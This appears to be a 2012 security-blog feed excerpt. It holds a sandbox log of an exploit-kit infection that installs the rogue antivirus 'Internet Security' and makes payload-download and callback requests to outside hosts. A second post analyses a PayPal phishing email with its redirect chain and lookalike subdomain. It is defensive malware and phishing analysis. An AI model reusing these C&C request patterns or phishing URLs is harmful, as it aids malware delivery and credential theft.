File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\Q96OL02U\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\B.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=6&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\B.tmp - 0 bytes
Process Created - %Temp%\5.tmp - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 6D778E0F95447E6546553EEEA709D03C - 389120 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\G55SBTS1\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\C.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=7&sel=77777
File Deleted - C:\WINDOWS\system32\cmd.exe - %Temp%\5.tmp - 218112 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\C.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\8YPELNXD\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\D.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=8&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\D.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\VBPHH91D\index[3].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\E.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=9&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\E.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\Q96OL02U\index[3].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %Temp%\jika0.22284718957661265.exe - %AppData%\LOCALS~1\Temp\~!#F.tmp
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#F.tmp - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes - attr: [-hidden] - PE
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#F.tmp - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes - attr: [-normal] - PE
Process Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#F.tmp - Unknown Publisher - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes
File Modified - %Temp%\~!#F.tmp - %AppData%\LOCALS~1\Temp\10.tmp
File Created - %Temp%\~!#F.tmp - %Temp%\10.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %Temp%\~!#F.tmp - %AllUsersAppData%\isecurity - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - %Temp%\~!#F.tmp - %AllUsersAppData%\isecurity.exe - Unknown Publisher - 58973908409767BF798936B2234CAAA6 - 840192 bytes
File Created - %Temp%\~!#F.tmp - %AllUsersDesktop%\Internet Security.lnk - A834D65A0129456792F9D08F2719781B - 794 bytes - attr: [] - -
Connection Established - %Temp%\~!#F.tmp - TCP - 174.133.57.114 - 80
Web Request - %Temp%\~!#F.tmp - GET - phatcutie .com - /gabi/s.php?id=103
Connection Established - %Temp%\~!#F.tmp - TCP - 72.167.207.74 - 80
Web Request - %Temp%\~!#F.tmp - GET - oneathleticmom .com - /images/b.php?id=103
File Created - %AppData%\LOCALS~1\Temp\~!#F.tmp - %Temp%\11.tmp - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes - attr: [] - PE

From the report we can see it is installed the rogue security software named “Internet Security”, the malicious executable file is dropped in the %AllUsersAppData% with the name isecurity.exe:

Process Created - %Temp%\~!#F.tmp - %AllUsersAppData%\isecurity.exe - Unknown Publisher - 58973908409767BF798936B2234CAAA6 - 840192 bytes
]]> http://blog.novirusthanks.org/2012/01/preventsweating-com-infected-by-incognito-exploit-kit/feed/ 0 Phishing: Update your PayPal account Information http://blog.novirusthanks.org/2012/01/phishing-update-your-paypal-account-information/ http://blog.novirusthanks.org/2012/01/phishing-update-your-paypal-account-information/#comments Mon, 16 Jan 2012 02:01:26 +0000 admin http://blog.novirusthanks.org/?p=3121 We have detected new phishing emails with subject “Update your PayPal account Information” that contain fake PayPal link that redirects to a phishing page used to steal PayPal account details of users that type their credentials.

Email header:

Subject: Update your PayPal account Information
Date: Mon, 16 Jan 2012 00:43:26 +0100
Received: from WIN-QJ6LOAE77N1 (unknown [109.169.70.227])

The malicious link is:

hxxp://technologyprojects. org/wp-rss.php

That redirects to:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 Jan 2012 01:08:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Location: hxxp://paypal.com-us.cgi-bin-webscr-cmd.login-submit-dispatch.74fghghs68g484iky4mn86we8r46d4h38df4b83m48hg3ui4ty84s83f4xcb78.norenterprises .com/us/webser/us
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Note the long subdomain name that begins with “paypal.com”:

paypal.com-us.cgi-bin-webscr-cmd.login-submit-dispatch.74fghghs68g484iky4mn86we8r46d4h38df4b83m48hg3ui4ty84s83f4xcb78.norenterprises. com

The ip address of the malicious domain is:

67.220.209.21 / server23.verygoodserver.com
]]> http://blog.novirusthanks.org/2012/01/phishing-update-your-paypal-account-information/feed/ 0